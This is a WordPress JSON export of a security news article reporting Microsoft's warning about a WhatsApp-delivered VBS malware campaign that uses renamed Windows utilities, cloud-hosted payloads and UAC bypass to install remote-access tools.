{"id":461,"date":"2026-04-01T14:50:34","date_gmt":"2026-04-01T14:50:34","guid":{"rendered":"https:\/\/thedigitalfortress.us\/?p=461"},"modified":"2026-04-01T14:50:34","modified_gmt":"2026-04-01T14:50:34","slug":"microsoft-warns-of-whatsapp-delivered-vbs-malware-hijacking-windows-via-uac-bypass","status":"publish","type":"post","link":"https:\/\/thedigitalfortress.us\/?p=461","title":{"rendered":"Microsoft Warns of WhatsApp-Delivered VBS Malware Hijacking Windows via UAC Bypass"},"content":{"rendered":"
\n

\ue804<\/i>Ravie Lakshmanan<\/span>\ue802<\/i>Apr 01, 2026<\/span><\/span>Social Engineering \/ Malware<\/span><\/p>\n<\/div>\n

\n
<\/a><\/div>\n

Microsoft is calling attention to a new campaign that has leveraged WhatsApp messages to distribute malicious Visual Basic Script (VBS) files.<\/p>\n

The activity, beginning in late February 2026, leverages these scripts to initiate a multi-stage infection chain for establishing persistence and enabling remote access. It’s currently not known what lures the threat actors use to trick users into executing the scripts.<\/p>\n

\u00abThe campaign relies on a combination of social engineering and living-off-the-land techniques,\u00bb the Microsoft Defender Security Research Team said<\/a>. \u00abIt uses renamed Windows utilities to blend into normal system activity, retrieves payloads from trusted cloud services such as AWS, Tencent Cloud, and Backblaze B2, and installs malicious Microsoft Installer (MSI) packages to maintain control of the system.\u00bb<\/p>\n

\n
\"Cybersecurity\"<\/a><\/div>\n<\/div>\n

The use of legitimate tools and trusted platforms is a deadly combination, as it allows threat actors to blend in normal network activity and increase the likelihood of success of their attacks.<\/p>\n

The activity begins with the attackers distributing malicious VBS files via WhatsApp messages that, when executed, create hidden folders in \u00abC:\\ProgramData\u00bb and drop renamed versions of legitimate Windows utilities like \u00abcurl.exe\u00bb (renamed as \u00abnetapi.dll\u00bb) and \u00abbitsadmin.exe\u00bb (renamed as \u00absc.exe\u00bb).<\/p>\n

\"\"<\/a><\/div>\n

Upon gaining an initial foothold, the attackers aim to\u202festablish\u202fpersistence and escalate privileges,\u202fultimately installing\u202fmalicious MSI packages on victim systems.\u202fThis is achieved by downloading auxiliary VBS files hosted on AWS S3, Tencent Cloud, and Backblaze B2 using the renamed binaries.<\/p>\n

\u00abOnce the secondary payloads are in place, the malware begins tampering with User Account Control (UAC) settings to weaken system defenses,\u00bb Redmond said. \u00abIt continuously attempts to launch cmd.exe with elevated privileges, retrying until UAC elevation succeeds or the process is forcibly terminated, modifying registry entries under HKLM\\Software\\Microsoft\\Win, and embedding persistence mechanisms to ensure the infection survives system reboots.\u00bb<\/p>\n

\n
\"Cybersecurity\"<\/a><\/div>\n<\/div>\n

These actions allow the threat actors to gain elevated privileges without user interaction via a combination of Registry manipulation with UAC bypass techniques, and ultimately deploy unsigned MSI installers. This includes legitimate tools like AnyDesk that provide attackers with persistent remote access, enabling the attackers to exfiltrate data or deploy more malware.<\/p>\n

\u00abThis campaign\u202fdemonstrates\u202fa sophisticated infection chain combining social engineering (WhatsApp delivery), stealth techniques (renamed legitimate tools, hidden attributes), and cloud-based payload hosting,\u00bb Microsoft said.<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"

\ue804Ravie Lakshmanan\ue802Apr 01, 2026Social Engineering \/ Malware Microsoft is calling attention to a new campaign that has leveraged WhatsApp messages to distribute malicious Visual Basic Script (VBS) files. The activity,…<\/p>\n","protected":false},"author":1,"featured_media":462,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[394,1014,42,147,1015,1013,148,1012,307],"class_list":["post-461","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized","tag-bypass","tag-hijacking","tag-malware","tag-microsoft","tag-uac","tag-vbs","tag-warns","tag-whatsappdelivered","tag-windows"],"_links":{"self":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts\/461","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=461"}],"version-history":[{"count":0,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts\/461\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/media\/462"}],"wp:attachment":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=461"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=461"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=461"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}